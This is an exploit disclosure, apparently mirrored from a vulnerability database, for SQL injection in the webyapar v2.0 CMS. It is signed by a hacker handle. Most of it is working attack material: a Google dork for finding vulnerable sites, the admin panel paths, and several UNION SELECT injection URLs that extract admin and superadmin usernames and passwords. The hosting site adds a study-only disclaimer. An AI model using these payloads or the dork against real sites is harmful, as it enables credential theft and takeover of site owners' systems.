######################################################################################################################### ######################################################################################################################### ############/$$$$$$$$$$$////$$$$$$$$$$$//###################///////////###############//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$/ ###///////##/$$$$$$$$//////////$$$$$$$$//####################/////////#####//////$$$$$//$$$$/////////////$$$$//////////// ##///////###/$$$$$$$////////////$$$$$$$//#####///////////#####///////#####///////$$$$$//$$$$/////////////$$$$//////////// ##//////###///$$$$$$$//////////$$$$$$$///#####///////////#####//////#####////////$$$$$//$$$$/////////////$$$$//////////// ##/////###/////$$$$$$$////////$$$$$$$////#####//////////######/////#####/////////$$$$$//$$$$/////////////$$$$//////////// ##////###///////$$$$$$$//////$$$$$$$/////######////////#######////#####//////////$$$$$//$$$$/////////////$$$$//////////// ##///###/////////$$$$$$$////$$$$$$$//////#######//////#######////#####///////////$$$$$//$$$$/////////////$$$$//////////// ###################$$$$$$##$$$$$$################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$ ####################$$$$$$$$$$$$#################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$ ##///###////////////$$$$$$$$$$$$/////////#########////////////#####//////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$ ##////###////////////$$$$$$$$$$//////////########////////////#####///////////////$$$$$/////////////$$$$//////////////$$$$ ##/////###////////////$$$$$$$$///////////#######////////////#####////////////////$$$$$/////////////$$$$//////////////$$$$ ##//////###////////////$$$$$$////////////#######///////////#####/////////////////$$$$$/////////////$$$$//////////////$$$$ ###//////##/////////////$$$$/////////////#######//////////#####//////////////////$$$$$/////////////$$$$//////////////$$$$ ############/////////////$$//////////////#######/////////#####///////////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$ ######################################################################################################################### ######################################################################################################################### ##### TURKISH SECUR&#304;TY MAN AND C0D3R ####################### MA&#304;L : dumanhack@gmail.com ########################### ##### - ##### web : ########## ##### PERFECT C0D3R AND SECUR&#304;TY ## >>>>>>>>>>>>>> MESSAGE : HAYAT &#304;LLEGAL <<<<<<<<<<<<<<< ## ######################################################################################################################### # Title : webyapar v2.0 Remote Blind SQL Injection Vulnerability # AUTHOR: : bypass # script name : Webyapar v2.0 { 700$ } # Language : Tr # scritp web page : www.webyapar.com # script bug : remote sql enjeksiyon # script admin panel1 : http://victim/script_path/yonetim # script admin panel2 : http://victim/script_path/yonetim2 # google dork : inurl:"?page=duyurular_detay&id=" #Message Tr : ingilizcem pek iyi degildir. kodun piyasada sat&#305;s degeri 700$ - kodun sql d&#305;s&#305;nda xss ac&#305;klar&#305;da bulunmaktad&#305;r ama pek fazla xss ac&#305;klar&#305; i&#351;inize yaramayacakt&#305;r. yonetim panelleri standart verilmistir... # Message Tr : Hayat &#304;llegal - / - < / -------------------------------------------------------------------------------------------------------- /> < / ------ Example sql bug 1 admin username : ------ / > http://V&#304;CT&#304;M/SCR&#304;PT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin < / ------ Example sql bug 1 admin password : ------ / > http://V&#304;CT&#304;M/SCR&#304;PT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin < / ------ Example sql bug 2 superadmin password and admin username : ------ / > http://V&#304;CT&#304;M/SCR&#304;PT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin < / -------------------------------------------------------------------------------------------------------- /> Sql enjeksiyon bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin Sql enjeksiyon bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+admin
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论